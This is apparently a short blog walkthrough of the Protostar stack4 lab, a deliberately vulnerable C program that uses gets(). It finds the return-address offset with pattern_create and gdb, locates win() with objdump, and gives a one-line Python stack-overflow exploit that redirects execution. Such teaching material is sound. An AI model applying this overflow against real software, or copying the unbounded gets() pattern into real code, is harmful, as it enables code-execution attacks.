note : This article is small because I didn’t want to solve stack 4 with stack 5 as stack 5 is different so I just wrote about stack 4 quickly


Introduction

Hey again ,Today’s article is going to be short. So last time I solved stack3 , I’m back again and today I’m going to solve stack4 which is really interesting , it’s slightly different from stack3 but that difference is a new thing to see if we compare it to the previous challenges. So let’s not talk too much and jump right in.


./stack4

Let’s take a look at the source code first :

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 char buffer[64];

 gets(buffer);
}

Very simple ! it defines the win function then defines the main function which sets a buffer of 64 chars and stores our input in it. But wait a second where is the variable that we’re gonna overwrite ? in the previous challenges we had a variable that is being used by a function to change the code flow , now what will we overwrite ?

The answer is the EIP which is the instruction pointer. And the instruction pointer is a memory address that holds the address of the next instruction in the program during execution. So if we overwrite that address the program will execute whatever that address refers to. let’s try to exceed the buffer.

python -c "print 'A' * 64"

The program didn’t even crash … why ? Because the return address is not directly after the buffer like in the previous challenges , Let’s try 100 chars

python -c "print 'A' * 100"

The program crashed , Let’s find where does it exactly crash like we did in the previous challenge read it if you haven’t done yet.

We will create a pattern with pattern_create

./pattern_create.rb -l 100

Then we will pass it to the program in gdb

It crashes at 0x63413563

We locate that with pattern_offset

./pattern_offset.rb -q 63413563

We get exact match at offset 76

Next step is to find the address of win()

objdump -d

The address is 0x080483f4

Now we can build our exploit :

python -c "print 'A' * 76 + '\xf4\x83\x04\x08'" | ./stack4

And we successfully changed the code flow !



That’s it , Feedback is appreciated !

Don’t forget to read the previous articles , Tweet about the article if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham

Thanks for reading.



Previous Buffer Overflow article : Buffer Overflow Practical Examples , metasploit , gdb and objdump ! - protostar stack3

Next Buffer Overflow article : Buffer Overflow Practical Examples , Shellcode Injection and Local Privilege Escalation - protostar stack5